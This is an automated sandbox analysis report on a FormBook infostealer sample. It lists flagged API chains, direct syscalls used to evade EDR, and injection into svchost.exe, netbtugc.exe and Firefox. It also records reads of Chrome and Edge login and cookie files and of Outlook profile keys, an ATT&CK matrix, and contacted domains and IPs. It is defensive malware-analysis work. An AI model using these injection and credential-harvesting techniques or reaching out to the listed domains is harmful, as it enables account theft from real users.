            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FCAEB0 mov eax, dword ptr fs:[00000030h]2_2_02FCAEB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FBCEA0 mov eax, dword ptr fs:[00000030h]2_2_02FBCEA0
            Source: C:\Users\user\Desktop\QLLafoDdqv.exeCode function: 0_2_00730B62 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,0_2_00730B62
            Source: C:\Users\user\Desktop\QLLafoDdqv.exeCode function: 0_2_00702622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00702622
            Source: C:\Users\user\Desktop\QLLafoDdqv.exeCode function: 0_2_006F083F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_006F083F
            Source: C:\Users\user\Desktop\QLLafoDdqv.exeCode function: 0_2_006F09D5 SetUnhandledExceptionFilter,0_2_006F09D5
            Source: C:\Users\user\Desktop\QLLafoDdqv.exeCode function: 0_2_006F0C21 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_006F0C21

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Found direct / indirect Syscall (likely to bypass EDR)
            Source: C:\Program Files (x86)\RjSlMTBtHFecsSmiWeXYnJopCqRthksFajZLjFLeKxwnWhBybNWDWOPmMKvpPtfQ\WOaBXdWwIJKzuV.exeNtResumeThread: Direct from: 0x773836ACJump to behavior
            Source: C:\Program Files (x86)\RjSlMTBtHFecsSmiWeXYnJopCqRthksFajZLjFLeKxwnWhBybNWDWOPmMKvpPtfQ\WOaBXdWwIJKzuV.exeNtMapViewOfSection: Direct from: 0x77382D1CJump to behavior
            Source: C:\Program Files (x86)\RjSlMTBtHFecsSmiWeXYnJopCqRthksFajZLjFLeKxwnWhBybNWDWOPmMKvpPtfQ\WOaBXdWwIJKzuV.exeNtWriteVirtualMemory: Direct from: 0x77382E3CJump to behavior
            Source: C:\Program Files (x86)\RjSlMTBtHFecsSmiWeXYnJopCqRthksFajZLjFLeKxwnWhBybNWDWOPmMKvpPtfQ\WOaBXdWwIJKzuV.exeNtProtectVirtualMemory: Direct from: 0x77382F9CJump to behavior
            Source: C:\Program Files (x86)\RjSlMTBtHFecsSmiWeXYnJopCqRthksFajZLjFLeKxwnWhBybNWDWOPmMKvpPtfQ\WOaBXdWwIJKzuV.exeNtSetInformationThread: Direct from: 0x773763F9Jump to behavior
            Source: C:\Program Files (x86)\RjSlMTBtHFecsSmiWeXYnJopCqRthksFajZLjFLeKxwnWhBybNWDWOPmMKvpPtfQ\WOaBXdWwIJKzuV.exeNtCreateMutant: Direct from: 0x773835CCJump to behavior
            Source: C:\Program Files (x86)\RjSlMTBtHFecsSmiWeXYnJopCqRthksFajZLjFLeKxwnWhBybNWDWOPmMKvpPtfQ\WOaBXdWwIJKzuV.exeNtNotifyChangeKey: Direct from: 0x77383C2CJump to behavior
            Source: C:\Program Files (x86)\RjSlMTBtHFecsSmiWeXYnJopCqRthksFajZLjFLeKxwnWhBybNWDWOPmMKvpPtfQ\WOaBXdWwIJKzuV.exeNtSetInformationProcess: Direct from: 0x77382C5CJump to behavior
            Source: C:\Program Files (x86)\RjSlMTBtHFecsSmiWeXYnJopCqRthksFajZLjFLeKxwnWhBybNWDWOPmMKvpPtfQ\WOaBXdWwIJKzuV.exeNtCreateUserProcess: Direct from: 0x7738371CJump to behavior
            Source: C:\Program Files (x86)\RjSlMTBtHFecsSmiWeXYnJopCqRthksFajZLjFLeKxwnWhBybNWDWOPmMKvpPtfQ\WOaBXdWwIJKzuV.exeNtQueryInformationProcess: Direct from: 0x77382C26Jump to behavior
            Source: C:\Program Files (x86)\RjSlMTBtHFecsSmiWeXYnJopCqRthksFajZLjFLeKxwnWhBybNWDWOPmMKvpPtfQ\WOaBXdWwIJKzuV.exeNtResumeThread: Direct from: 0x77382FBCJump to behavior
            Source: C:\Program Files (x86)\RjSlMTBtHFecsSmiWeXYnJopCqRthksFajZLjFLeKxwnWhBybNWDWOPmMKvpPtfQ\WOaBXdWwIJKzuV.exeNtWriteVirtualMemory: Direct from: 0x7738490CJump to behavior
            Source: C:\Program Files (x86)\RjSlMTBtHFecsSmiWeXYnJopCqRthksFajZLjFLeKxwnWhBybNWDWOPmMKvpPtfQ\WOaBXdWwIJKzuV.exeNtAllocateVirtualMemory: Direct from: 0x77383C9CJump to behavior
            Source: C:\Program Files (x86)\RjSlMTBtHFecsSmiWeXYnJopCqRthksFajZLjFLeKxwnWhBybNWDWOPmMKvpPtfQ\WOaBXdWwIJKzuV.exeNtReadFile: Direct from: 0x77382ADCJump to behavior
            Source: C:\Program Files (x86)\RjSlMTBtHFecsSmiWeXYnJopCqRthksFajZLjFLeKxwnWhBybNWDWOPmMKvpPtfQ\WOaBXdWwIJKzuV.exeNtAllocateVirtualMemory: Direct from: 0x77382BFCJump to behavior
            Source: C:\Program Files (x86)\RjSlMTBtHFecsSmiWeXYnJopCqRthksFajZLjFLeKxwnWhBybNWDWOPmMKvpPtfQ\WOaBXdWwIJKzuV.exeNtDelayExecution: Direct from: 0x77382DDCJump to behavior
            Source: C:\Program Files (x86)\RjSlMTBtHFecsSmiWeXYnJopCqRthksFajZLjFLeKxwnWhBybNWDWOPmMKvpPtfQ\WOaBXdWwIJKzuV.exeNtQuerySystemInformation: Direct from: 0x77382DFCJump to behavior
            Source: C:\Program Files (x86)\RjSlMTBtHFecsSmiWeXYnJopCqRthksFajZLjFLeKxwnWhBybNWDWOPmMKvpPtfQ\WOaBXdWwIJKzuV.exeNtOpenSection: Direct from: 0x77382E0CJump to behavior
            Source: C:\Program Files (x86)\RjSlMTBtHFecsSmiWeXYnJopCqRthksFajZLjFLeKxwnWhBybNWDWOPmMKvpPtfQ\WOaBXdWwIJKzuV.exeNtQueryVolumeInformationFile: Direct from: 0x77382F2CJump to behavior
            Source: C:\Program Files (x86)\RjSlMTBtHFecsSmiWeXYnJopCqRthksFajZLjFLeKxwnWhBybNWDWOPmMKvpPtfQ\WOaBXdWwIJKzuV.exeNtQuerySystemInformation: Direct from: 0x773848CCJump to behavior
            Source: C:\Program Files (x86)\RjSlMTBtHFecsSmiWeXYnJopCqRthksFajZLjFLeKxwnWhBybNWDWOPmMKvpPtfQ\WOaBXdWwIJKzuV.exeNtReadVirtualMemory: Direct from: 0x77382E8CJump to behavior
            Source: C:\Program Files (x86)\RjSlMTBtHFecsSmiWeXYnJopCqRthksFajZLjFLeKxwnWhBybNWDWOPmMKvpPtfQ\WOaBXdWwIJKzuV.exeNtCreateKey: Direct from: 0x77382C6CJump to behavior
            Source: C:\Program Files (x86)\RjSlMTBtHFecsSmiWeXYnJopCqRthksFajZLjFLeKxwnWhBybNWDWOPmMKvpPtfQ\WOaBXdWwIJKzuV.exeNtClose: Direct from: 0x77382B6C
            Source: C:\Program Files (x86)\RjSlMTBtHFecsSmiWeXYnJopCqRthksFajZLjFLeKxwnWhBybNWDWOPmMKvpPtfQ\WOaBXdWwIJKzuV.exeNtAllocateVirtualMemory: Direct from: 0x773848ECJump to behavior
            Source: C:\Program Files (x86)\RjSlMTBtHFecsSmiWeXYnJopCqRthksFajZLjFLeKxwnWhBybNWDWOPmMKvpPtfQ\WOaBXdWwIJKzuV.exeNtQueryAttributesFile: Direct from: 0x77382E6CJump to behavior
            Source: C:\Program Files (x86)\RjSlMTBtHFecsSmiWeXYnJopCqRthksFajZLjFLeKxwnWhBybNWDWOPmMKvpPtfQ\WOaBXdWwIJKzuV.exeNtSetInformationThread: Direct from: 0x77382B4CJump to behavior
            Source: C:\Program Files (x86)\RjSlMTBtHFecsSmiWeXYnJopCqRthksFajZLjFLeKxwnWhBybNWDWOPmMKvpPtfQ\WOaBXdWwIJKzuV.exeNtTerminateThread: Direct from: 0x77382FCCJump to behavior
            Source: C:\Program Files (x86)\RjSlMTBtHFecsSmiWeXYnJopCqRthksFajZLjFLeKxwnWhBybNWDWOPmMKvpPtfQ\WOaBXdWwIJKzuV.exeNtQueryInformationToken: Direct from: 0x77382CACJump to behavior
            Source: C:\Program Files (x86)\RjSlMTBtHFecsSmiWeXYnJopCqRthksFajZLjFLeKxwnWhBybNWDWOPmMKvpPtfQ\WOaBXdWwIJKzuV.exeNtOpenKeyEx: Direct from: 0x77382B9CJump to behavior
            Source: C:\Program Files (x86)\RjSlMTBtHFecsSmiWeXYnJopCqRthksFajZLjFLeKxwnWhBybNWDWOPmMKvpPtfQ\WOaBXdWwIJKzuV.exeNtAllocateVirtualMemory: Direct from: 0x77382BECJump to behavior
            Source: C:\Program Files (x86)\RjSlMTBtHFecsSmiWeXYnJopCqRthksFajZLjFLeKxwnWhBybNWDWOPmMKvpPtfQ\WOaBXdWwIJKzuV.exeNtDeviceIoControlFile: Direct from: 0x77382AECJump to behavior
            Source: C:\Program Files (x86)\RjSlMTBtHFecsSmiWeXYnJopCqRthksFajZLjFLeKxwnWhBybNWDWOPmMKvpPtfQ\WOaBXdWwIJKzuV.exeNtCreateFile: Direct from: 0x77382FECJump to behavior
            Source: C:\Program Files (x86)\RjSlMTBtHFecsSmiWeXYnJopCqRthksFajZLjFLeKxwnWhBybNWDWOPmMKvpPtfQ\WOaBXdWwIJKzuV.exeNtOpenFile: Direct from: 0x77382DCCJump to behavior
            Source: C:\Program Files (x86)\RjSlMTBtHFecsSmiWeXYnJopCqRthksFajZLjFLeKxwnWhBybNWDWOPmMKvpPtfQ\WOaBXdWwIJKzuV.exeNtProtectVirtualMemory: Direct from: 0x77377B2EJump to behavior
            Maps a DLL or memory area into another process
            Source: C:\Users\user\Desktop\QLLafoDdqv.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Program Files (x86)\RjSlMTBtHFecsSmiWeXYnJopCqRthksFajZLjFLeKxwnWhBybNWDWOPmMKvpPtfQ\WOaBXdWwIJKzuV.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Windows\SysWOW64\netbtugc.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: NULL target: C:\Program Files (x86)\RjSlMTBtHFecsSmiWeXYnJopCqRthksFajZLjFLeKxwnWhBybNWDWOPmMKvpPtfQ\WOaBXdWwIJKzuV.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: NULL target: C:\Program Files (x86)\RjSlMTBtHFecsSmiWeXYnJopCqRthksFajZLjFLeKxwnWhBybNWDWOPmMKvpPtfQ\WOaBXdWwIJKzuV.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
            Modifies the context of a thread in another process (thread injection)
            Source: C:\Windows\SysWOW64\netbtugc.exeThread register set: target process: 3536Jump to behavior
            Queues an APC in another process (thread injection)
            Source: C:\Windows\SysWOW64\netbtugc.exeThread APC queued: target process: C:\Program Files (x86)\RjSlMTBtHFecsSmiWeXYnJopCqRthksFajZLjFLeKxwnWhBybNWDWOPmMKvpPtfQ\WOaBXdWwIJKzuV.exeJump to behavior
            Writes to foreign memory regions
            Source: C:\Users\user\Desktop\QLLafoDdqv.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 2231008Jump to behavior
            Source: C:\Users\user\Desktop\QLLafoDdqv.exeCode function: 0_2_00731201 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_00731201
            Source: C:\Users\user\Desktop\QLLafoDdqv.exeCode function: 0_2_00712BA5 SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00712BA5
            Source: C:\Users\user\Desktop\QLLafoDdqv.exeCode function: 0_2_0073B226 SendInput,keybd_event,0_2_0073B226
            Source: C:\Users\user\Desktop\QLLafoDdqv.exeCode function: 0_2_007522DA GetForegroundWindow,GetDesktopWindow,GetWindowRect,mouse_event,GetCursorPos,mouse_event,0_2_007522DA
            Source: C:\Users\user\Desktop\QLLafoDdqv.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\QLLafoDdqv.exe"Jump to behavior
            Source: C:\Program Files (x86)\RjSlMTBtHFecsSmiWeXYnJopCqRthksFajZLjFLeKxwnWhBybNWDWOPmMKvpPtfQ\WOaBXdWwIJKzuV.exeProcess created: C:\Windows\SysWOW64\netbtugc.exe "C:\Windows\SysWOW64\netbtugc.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
            Source: C:\Users\user\Desktop\QLLafoDdqv.exeCode function: 0_2_00730B62 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,0_2_00730B62
            Source: C:\Users\user\Desktop\QLLafoDdqv.exeCode function: 0_2_00731663 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,0_2_00731663
            Source: QLLafoDdqv.exeBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
            Source: WOaBXdWwIJKzuV.exe, 00000003.00000000.2196131693.0000000001930000.00000002.00000001.00040000.00000000.sdmp, WOaBXdWwIJKzuV.exe, 00000003.00000002.4571525202.0000000001930000.00000002.00000001.00040000.00000000.sdmp, WOaBXdWwIJKzuV.exe, 00000008.00000002.4574449096.0000000001800000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: IProgram Manager
            Source: QLLafoDdqv.exe, WOaBXdWwIJKzuV.exe, 00000003.00000000.2196131693.0000000001930000.00000002.00000001.00040000.00000000.sdmp, WOaBXdWwIJKzuV.exe, 00000003.00000002.4571525202.0000000001930000.00000002.00000001.00040000.00000000.sdmp, WOaBXdWwIJKzuV.exe, 00000008.00000002.4574449096.0000000001800000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
            Source: WOaBXdWwIJKzuV.exe, 00000003.00000000.2196131693.0000000001930000.00000002.00000001.00040000.00000000.sdmp, WOaBXdWwIJKzuV.exe, 00000003.00000002.4571525202.0000000001930000.00000002.00000001.00040000.00000000.sdmp, WOaBXdWwIJKzuV.exe, 00000008.00000002.4574449096.0000000001800000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
            Source: WOaBXdWwIJKzuV.exe, 00000003.00000000.2196131693.0000000001930000.00000002.00000001.00040000.00000000.sdmp, WOaBXdWwIJKzuV.exe, 00000003.00000002.4571525202.0000000001930000.00000002.00000001.00040000.00000000.sdmp, WOaBXdWwIJKzuV.exe, 00000008.00000002.4574449096.0000000001800000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
            Source: C:\Users\user\Desktop\QLLafoDdqv.exeCode function: 0_2_006F0698 cpuid 0_2_006F0698
            Source: C:\Users\user\Desktop\QLLafoDdqv.exeCode function: 0_2_00748195 GetLocalTime,SystemTimeToFileTime,LocalFileTimeToFileTime,GetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,0_2_00748195
            Source: C:\Users\user\Desktop\QLLafoDdqv.exeCode function: 0_2_0072D27A GetUserNameW,0_2_0072D27A
            Source: C:\Users\user\Desktop\QLLafoDdqv.exeCode function: 0_2_0070B952 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,0_2_0070B952
            Source: C:\Users\user\Desktop\QLLafoDdqv.exeCode function: 0_2_006D42DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_006D42DE

            Stealing of Sensitive Information

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 2.2.svchost.exe.24d0000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.svchost.exe.24d0000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000004.00000002.4564773775.0000000002530000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.4581093569.00000000055C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.4574527555.0000000002BF0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2270118769.0000000002E80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2269837439.00000000024D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.4574542638.0000000002F30000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.4575593241.0000000002C30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2270555889.0000000003350000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Tries to harvest and steal browser information (history, passwords, etc)
            Source: C:\Windows\SysWOW64\netbtugc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
            Tries to steal Mail credentials (via file / registry access)
            Source: C:\Windows\SysWOW64\netbtugc.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior
            Source: QLLafoDdqv.exeBinary or memory string: WIN_81
            Source: QLLafoDdqv.exeBinary or memory string: WIN_XP
            Source: QLLafoDdqv.exeBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_11WIN_10WIN_2022WIN_2019WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\AppearanceUSERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYRegDeleteKeyExWadvapi32.dll+.-.\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs](*UCP)\XISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGGETCOUNTSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXPANDmsctls_statusbar321tooltips_class32%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----@GUI_DRAGID@GUI_DROPID@GUI_DRAGFILEError text not found (please report)Q\EDEFINEUTF16)UTF)UCP)NO_AUTO_POSSESS)NO_START_OPT)LIMIT_MATCH=LIMIT_RECURSION=CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument not compiled in 16 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
            Source: QLLafoDdqv.exeBinary or memory string: WIN_XPe
            Source: QLLafoDdqv.exeBinary or memory string: WIN_VISTA
            Source: QLLafoDdqv.exeBinary or memory string: WIN_7
            Source: QLLafoDdqv.exeBinary or memory string: WIN_8

            Remote Access Functionality

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 2.2.svchost.exe.24d0000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.svchost.exe.24d0000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000004.00000002.4564773775.0000000002530000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.4581093569.00000000055C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.4574527555.0000000002BF0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2270118769.0000000002E80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2269837439.00000000024D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.4574542638.0000000002F30000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.4575593241.0000000002C30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2270555889.0000000003350000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: C:\Users\user\Desktop\QLLafoDdqv.exeCode function: 0_2_00751204 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,0_2_00751204
            Source: C:\Users\user\Desktop\QLLafoDdqv.exeCode function: 0_2_00751806 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,0_2_00751806

            Mitre Att&ck Matrix

            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire Infrastructure2
            Valid Accounts            		1
            Native API            		1
            DLL Side-Loading            		1
            Exploitation for Privilege Escalation            		1
            Disable or Modify Tools            		1
            OS Credential Dumping            		2
            System Time Discovery            		Remote Services1
            Archive Collected Data            		4
            Ingress Tool Transfer            		Exfiltration Over Other Network Medium1
            System Shutdown/Reboot
            CredentialsDomainsDefault AccountsScheduled Task/Job2
            Valid Accounts            		1
            Abuse Elevation Control Mechanism            		1
            Deobfuscate/Decode Files or Information            		21
            Input Capture            		1
            Account Discovery            		Remote Desktop Protocol1
            Data from Local System            		1
            Encrypted Channel            		Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
            DLL Side-Loading            		1
            Abuse Elevation Control Mechanism            		Security Account Manager2
            File and Directory Discovery            		SMB/Windows Admin Shares1
            Email Collection            		4
            Non-Application Layer Protocol            		Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook2
            Valid Accounts            		3
            Obfuscated Files or Information            		NTDS116
            System Information Discovery            		Distributed Component Object Model21
            Input Capture            		4
            Application Layer Protocol            		Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script21
            Access Token Manipulation            		1
            DLL Side-Loading            		LSA Secrets241
            Security Software Discovery            		SSH3
            Clipboard Data            		Fallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts412
            Process Injection            		2
            Valid Accounts            		Cached Domain Credentials12
            Virtualization/Sandbox Evasion            		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items12
            Virtualization/Sandbox Evasion            		DCSync3
            Process Discovery            		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job21
            Access Token Manipulation            		Proc Filesystem11
            Application Window Discovery            		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
            Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt412
            Process Injection            		/etc/passwd and /etc/shadow1
            System Owner/User Discovery            		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1486705 Sample: QLLafoDdqv.exe Startdate: 02/08/2024 Architecture: WINDOWS Score: 100 28 www.joyesi.xyz 2->28 30 www.magmadokum.com 2->30 32 18 other IPs or domains 2->32 42 Multi AV Scanner detection for domain / URL 2->42 44 Malicious sample detected (through community Yara rule) 2->44 46 Antivirus detection for URL or domain 2->46 50 5 other signatures 2->50 10 QLLafoDdqv.exe 4 2->10         started        signatures3 48 Performs DNS queries to domains with low reputation 28->48 process4 signatures5 62 Binary is likely a compiled AutoIt script file 10->62 64 Found API chain indicative of sandbox detection 10->64 66 Writes to foreign memory regions 10->66 68 2 other signatures 10->68 13 svchost.exe 10->13         started        process6 signatures7 70 Maps a DLL or memory area into another process 13->70 16 WOaBXdWwIJKzuV.exe 13->16 injected process8 signatures9 40 Found direct / indirect Syscall (likely to bypass EDR) 16->40 19 netbtugc.exe 13 16->19         started        process10 signatures11 52 Tries to steal Mail credentials (via file / registry access) 19->52 54 Tries to harvest and steal browser information (history, passwords, etc) 19->54 56 Modifies the context of a thread in another process (thread injection) 19->56 58 3 other signatures 19->58 22 WOaBXdWwIJKzuV.exe 19->22 injected 26 firefox.exe 19->26         started        process12 dnsIp13 34 www.liangyuen528.com 15.197.172.60, 49749, 49750, 49751 TANDEMUS United States 22->34 36 www.donnavariedades.com 15.197.240.20, 49763, 49764, 49765 TANDEMUS United States 22->36 38 12 other IPs or domains 22->38 60 Found direct / indirect Syscall (likely to bypass EDR) 22->60 signatures14

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            QLLafoDdqv.exe55%ReversingLabsWin32.Trojan.Strab
            QLLafoDdqv.exe40%VirustotalBrowse
            QLLafoDdqv.exe100%Joe Sandbox ML

            Dropped Files

            No Antivirus matches

            Unpacked PE Files

            No Antivirus matches

            Domains

            SourceDetectionScannerLabelLink
            www.donnavariedades.com8%VirustotalBrowse
            empowermedeco.com12%VirustotalBrowse
            www.liangyuen528.com6%VirustotalBrowse
            natroredirect.natrocdn.com0%VirustotalBrowse
            www.kasegitai.tokyo7%VirustotalBrowse
            www.rssnewscast.com6%VirustotalBrowse
            www.goldenjade-travel.com9%VirustotalBrowse
            www.shenzhoucui.com9%VirustotalBrowse
            www.techchains.info11%VirustotalBrowse
            www.magmadokum.com9%VirustotalBrowse
            www.660danm.top11%VirustotalBrowse
